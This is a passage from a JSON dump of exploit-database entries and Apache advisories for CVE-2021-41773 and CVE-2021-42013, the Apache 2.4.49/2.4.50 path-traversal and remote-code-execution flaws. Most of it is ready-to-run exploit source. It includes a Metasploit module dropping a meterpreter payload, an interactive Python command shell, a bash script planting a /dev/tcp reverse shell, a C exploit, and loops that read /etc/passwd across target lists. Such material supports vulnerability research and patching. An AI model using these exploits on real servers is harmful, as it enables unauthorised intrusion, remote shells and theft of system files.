Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2021-10-26T00:00:00", "id": "1337DAY-ID-36952", "href": "https://0day.today/exploit/description/36952", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE',\n 'Description' => %q{\n This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',\n 'Action' => 'CHECK_RCE',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Targets' => [\n [\n 'Automatic (Dropper)',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => 'false'\n }\n }\n ],\n [\n 'Unix Command (In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def execute_command(command, _opts = {})\n traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n\n uri = normalize_uri(datastore['TARGETURI'], traversal.to_s)\n response = send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => uri,\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\"\n })\n if response && response.body\n return response.body\n end\n\n false\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n\n if (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n\n print_status(message(\"Attempt to exploit for #{datastore['CVE']}\"))\n case target['Type']\n when :linux_dropper\n\n file_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\"\n cmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\"\n\n print_status(message(\"Sending #{datastore['PAYLOAD']} command payload\"))\n vprint_status(message(\"Generated command payload: #{cmd}\"))\n\n execute_command(cmd)\n\n register_file_for_cleanup file_name\n when :unix_command\n vprint_status(message(\"Generated payload: #{payload.encoded}\"))\n\n if !cmd_unix_generic?\n execute_command(payload.encoded)\n else\n received = execute_command(payload.encoded.to_s)\n\n print_warning(message('Dumping command output in response'))\n if !received\n print_error(message('Empty response, no command output'))\n\n return\n end\n print_line(received)\n end\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/36952", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-03T01:49:07", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution Exploit (3)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2021-11-11T00:00:00", "id": "1337DAY-ID-37030", "href": "https://0day.today/exploit/description/37030", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)\n# Exploit Author: Valentin Lobstein\n# Vendor Homepage: https://apache.org/\n# Software Link: https://github.com/Balgogan/CVE-2021-41773\n# Version: Apache 2.4.49/2.4.50 (CGI enabled)\n# Tested on: Debian GNU/Linux\n# CVE : CVE-2021-41773 / CVE-2021-42013\n# Credits : Lucas Schnell\n\n\n#!/usr/bin/env python3\n#coding: utf-8\n\nimport os\nimport re\nimport sys\nimport time\nimport requests\nfrom colorama import Fore,Style\n\n\nheader = '''\\033[1;91m\n \n \u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \n \u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \n \u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \n \u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \n \u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592\n \u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591\n \u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\n \u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \n''' + Style.RESET_ALL\n\n\nif len(sys.argv) < 2 :\n print( 'Use: python3 file.py ip:port ' )\n sys.exit()\n\ndef end():\n print(\"\\t\\033[1;91m[!] Bye bye !\")\n time.sleep(0.5)\n sys.exit(1)\n\ndef commands(url,command,session):\n directory = mute_command(url,'pwd')\n user = mute_command(url,'whoami')\n hostname = mute_command(url,'hostname')\n advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)')\n command = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \n command = f\"echo; {command};\"\n req = requests.Request('POST', url=url, data=command)\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n output = response.text\n print(output)\n if 'clear' in command:\n os.system('/usr/bin/clear')\n print(header)\n if 'exit' in command:\n end()\n\ndef mute_command(url,command):\n session = requests.Session()\n req = requests.Request('POST', url=url, data=f\"echo; {command}\")\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n return response.text.strip()\n\n\ndef exploitRCE(payload):\n s = requests.Session()\n try:\n host = sys.argv[1]\n if 'http' not in host:\n url = 'http://'+ host + payload\n else:\n url = host + payload \n session = requests.Session()\n command = \"echo; id\"\n req = requests.Request('POST', url=url, data=command)\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n output = response.text\n if \"uid\" in output:\n choice = \"Y\"\n print( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host)\n print(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output )\n choice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? (Y/n) : \")\n if choice.lower() in ['','y','yes']:\n while True:\n commands(url,command,session) \n else:\n end() \n else :\n print(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host)\n except KeyboardInterrupt:\n end()\n\ndef main():\n try:\n apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'\n apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'\n payloads = [apache2449_payload,apache2450_payload]\n choice = len(payloads) + 1\n print(header)\n print(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\")\n while choice >= len(payloads) and choice >= 0:\n choice = int(input('[~] Choice : '))\n if choice < len(payloads):\n exploitRCE(payloads[choice])\n except KeyboardInterrupt:\n print(\"\\n\\033[1;91m[!] Bye bye !\")\n time.sleep(0.5)\n sys.exit(1)\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/37030", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-16T05:38:55", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-25T00:00:00", "id": "1337DAY-ID-36937", "href": "https://0day.today/exploit/description/36937", "sourceData": "# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)\n# Credits: Ash Daulton & cPanel Security Team\n# Exploit Author: TheLastVvV.com\n# Vendor Homepage: https://apache.org/\n# Version: Apache 2.4.50 with CGI enable\n# Tested on : Debian 5.10.28\n# CVE : CVE-2021-42013\n\n#!/bin/bash\n\necho 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'\nif [ $# -eq 0 ]\nthen\necho \"try: ./$0 http://ip:port LHOST LPORT\"\nexit 1\nfi\ncurl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh\" && curl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh\"\n\n#usage chmod -x CVE-2021-42013.sh\n#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT\n", "sourceHref": "https://0day.today/exploit/36937", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-07T08:00:41", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "zdt", "title": "Apache 2.4.50 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-06-07T00:00:00", "id": "1337DAY-ID-37777", "href": "https://0day.today/exploit/description/37777", "sourceData": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdbool.h>\n#include <string.h>\n#include <curl/curl.h>\n\n/* Apache 2.4.50 exploit (CVE-2021-42013)\n * Author: Vilius Povilaika\n * Website: www.povilaika.com */\n\n// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013\n\nint usage(char* prog)\n{\n printf(\"Usage: %s <host> <exec>\\n\", prog);\n printf(\" - %s https://127.0.0.1 \\\"uname -a\\\"\\n\", prog);\n return 0;\n}\n\nbool error(const char* reason)\n{\n printf(\"[ERR] Critical error - %s\\n\", reason);\n return false;\n}\n\nstruct callback_result {\n char* data;\n size_t size;\n};\n\nstatic size_t callback(void* pointer, size_t size, size_t nmemb, void* data)\n{\n struct callback_result *memory = (struct callback_result *)data;\n char* ptr = realloc(memory->data, memory->size+nmemb+1);\n memory->data = ptr;\n memcpy(&(memory->data[memory->size]), pointer, nmemb);\n memory->size += nmemb;\n memory->data[memory->size] = 0;\n return nmemb;\n}\n\nbool exploit(void* result, char* host, char* exec)\n{\n CURL *curl = curl_easy_init();\n char url[256];\n sprintf(url, \"%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh\", host);\n curl_easy_setopt(curl, CURLOPT_URL, url);\n char payload[256];\n sprintf(payload, \"echo Content-Type: text/plain; echo; %s\", exec);\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);\n curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);\n curl_easy_setopt(curl, CURLOPT_WRITEDATA, result);\n int res = curl_easy_perform(curl);\n if (res != CURLE_OK)\n return error(curl_easy_strerror(res));\n curl_easy_cleanup(curl);\n return true;\n}\n\nint main(int argc, char* argv[])\n{\n if (argc != 3)\n return usage(argv[0]);\n struct callback_result result = {0};\n bool res = exploit(&result, argv[1], argv[2]);\n if (res)\n printf(\"[+] Exploit finished successfully, check output\\n\");\n else\n printf(\"[-] Exploit failed, check output\\n\");\n printf(\" \\n%s\\n\", result.data);\n return 0;\n}\n", "sourceHref": "https://0day.today/exploit/37777", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-03T01:52:37", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-13T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-10-13T00:00:00", "id": "1337DAY-ID-36897", "href": "https://0day.today/exploit/description/36897", "sourceData": "# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)\n# Exploit Author: Lucas Souza https://lsass.io\n# Vendor Homepage: https://apache.org/\n# Version: 2.4.50\n# Tested on: 2.4.50\n# CVE : CVE-2021-42013\n# Credits: Ash Daulton and the cPanel Security Team\n\n#!/bin/bash\n\nif [[ $1 == '' ]]; [[ $2 == '' ]]; then\necho Set [TAGET-LIST.TXT] [PATH] [COMMAND]\necho ./PoC.sh targets.txt /etc/passwd\necho ./PoC.sh targets.txt /bin/sh id\n\nexit\nfi\nfor host in $(cat $1); do\necho $host\ncurl -s --path-as-is -d \"echo Content-Type: text/plain; echo; $3\" \"$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2\"; done\n\n# PoC.sh targets.txt /etc/passwd\n# PoC.sh targets.txt /bin/sh whoami\n", "sourceHref": "https://0day.today/exploit/36897", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:49:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-06T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.49 - Path Traversal Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-06T00:00:00", "id": "1337DAY-ID-36854", "href": "https://0day.today/exploit/description/36854", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal\n# Exploit Author: Lucas Souza https://lsass.io\n# Vendor Homepage: https://apache.org/\n# Version: 2.4.49\n# Tested on: 2.4.49\n# CVE : CVE-2021-41773\n# Credits: Ash Daulton and the cPanel Security Team\n\n#!/bin/bash\n\nif [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then\necho Set [TAGET-LIST.TXT] [PATH]\necho ./PoC.sh targets.txt /etc/passwd\nexit\nfi\nfor host in $(cat $1); do\ncurl --silent --path-as-is --insecure \"$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2\"; done\n", "sourceHref": "https://0day.today/exploit/36854", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "httpd": [{"lastseen": "2022-03-17T19:28:46", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. \n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.4.51 : Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "HTTPD:E1C40920F9DFC60284EEE7539DA30483", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T17:50:44", "description": "While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing,\nallowing an external source to DoS the server. This requires a specially crafted request. \n\nThe vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-04T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.4.50 : null pointer dereference in h2 fuzzing", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2021-10-04T00:00:00", "id": "HTTPD:9BD7C7441A852DCB472C001D2290429F", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-26T17:50:44", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.\n\nThis issue is known to be exploited in the wild.\n\nThis issue only affects Apache 2.4.49 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-29T00:00:00", "type": "httpd", "title": "Apache Httpd < 2.4.50 : Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 